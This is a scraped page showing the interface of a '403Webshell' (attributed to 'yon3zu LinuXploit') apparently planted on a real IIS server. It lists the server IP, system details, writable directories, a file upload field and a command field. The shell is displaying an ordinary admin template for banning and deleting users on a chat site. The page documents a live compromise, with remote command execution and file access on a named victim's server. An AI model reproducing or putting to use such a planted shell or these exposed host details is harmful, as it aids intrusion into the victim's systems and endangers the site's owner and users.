403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/default//ban_users.html
{header}
<div class="block_narrow">
    {menu_page}
</div>
<script type="text/javascript">
    var m = "{message}";
    if (m != "") {alert("{message}");}
    $(document).ready(function(){
        var CBoxNote = function (ch, chkbox){
            if(ch.is(':checked')) {
                chkbox.prop("checked", true);
            }else{
                chkbox.prop("checked", false);
            }
        }

        $('#all').change(function(){
            CBoxNote($(this), $('[id ^= chk_]'))
        });

    });
    function action_user(type) {
        var StrID = '';
        $('[id ^= chk_]:checked').each(function(){
            StrID += ($(this).attr("id").replace(/chk_/g, '')+',')
        })
        var user = StrID.slice(0, -1);

        window.location.href='{url_page}?'+type+'='+user;//delete release
    }
</script>
<div class="block_main">
    <h2>{l_title_current}</h2>

    <!-- begin_main_pages -->
    <div>{num_total} {l_count_users}</div>
    <div  style="position: relative; padding: 0px 0px; top: -14px; left: 300px; width: 400px; ">
    <!-- begin_main_prev_page --><a href="{url_page}?offset={offset}{params}">{l_prev}</a> | <!-- end_main_prev_page -->
    <!-- begin_main_prev_page_off --><b>{l_prev}</b> | <!-- end_main_prev_page_off -->
    <!-- begin_main_first_page --><a href="{url_page}?offset={offset}{params}">{l_page_1}</a><!-- end_main_first_page -->
    <!-- begin_main_prev_pages --><a href="{url_page}?offset={offset}{params}">&lt;&lt;</a><!-- end_main_prev_pages -->
    <!-- begin_main_page -->
    <!-- begin_main_link_page --><a href="{url_page}?offset={offset}{params}">{page}</a><!-- end_main_link_page -->
    <!-- begin_main_this_page --><b>{page}</b><!-- end_main_this_page -->
    <!-- end_main_page -->
    <!-- begin_main_next_pages --><a href="{url_page}?offset={offset}{params}">&gt;&gt;</a><!-- end_main_next_pages -->
    <!-- begin_main_last_page --><b>{l_of}</b> <a href="{url_page}?offset={offset}{params}">{num_pages}</a><!-- end_main_last_page -->
    <!-- begin_main_next_page --> | <a href="{url_page}?offset={offset}{params}">{l_next}</a><!-- end_main_next_page -->
    <!-- begin_main_next_page_off --> | <b>{l_next}</b><!-- end_main_next_page_off -->
    </div>
    <!-- end_main_pages -->



    <!-- begin_main_items -->
    <table class="tb" style="width: 640px;">
    <tr>
        <th class="decor_l"></th>
        <th style="width: 16px;" class="right">
            <input style="margin:0px; width: 12px;" type="checkbox" id="all">
        </th>
        <th style="text-align: center; width: 130px;">{l_ban_time}</th>
        <th style="text-align: center;">{l_username}</th>
       	<th style="border: none; padding-left: 8px; width: 95px; text-align: center;">{l_action}</th>
        <th class="decor_r"></th>
    </tr>

    <!-- begin_main_item -->
    <tr class="{class}">
        <td class="decor{decl}"></td>
        <td class="right">
            <input style="margin:0px;" type="checkbox" id="chk_{user_id}">
        </td>
        <td style="padding-left: 8px;">
            {ban_time}
        </td>
        <td style="padding-left: 8px;">
            <a href="{url_main}administration/users_edit.php?id={user_id}">{name}</a>
            <!-- begin_main_item_list_mail -->
            <a href="{url_main}administration/look_message_mail.php?user_id={main_item_list_mail_user_id}">{l_mails}</a>
            <!-- end_main_item_list_mail -->
        </td>
        <td style="border: none; padding-left:20px; text-align: center;">
            <a href="{url_page}?release={user_id}">{l_release_ban}</a>
            |
            <a href="{url_page}?delete={user_id}" onclick="if (confirm('{l_are_you_sure}')) return true; else return false;">{l_delete}</a>
        </td>
        <td class="decor{decr}"></td>
    </tr>
    <!-- end_main_item -->
    </table>
    <!-- end_main_items -->

    <!-- begin_main_noitems -->
    <div align="center">{l_no_users}</div>
    <!-- end_main_noitems -->
    <!-- begin_delete_all -->
    <div class="btn fl_left">
        <a class="submit" onclick="if (confirm('{l_are_you_sure}')) action_user('release'); else return false; " href="#">{l_release}</a>
    </div>
    <div class="btn fl_left">
        <a class="submit" onclick="if (confirm('{l_are_you_sure}')) action_user('delete'); else return false; " href="#">{l_delete}</a>
    </div>
    <!-- end_delete_all -->
    <div class="empty"></div>
</div>
{footer}

Youez - 2016 - github.com/yon3zu
LinuXploit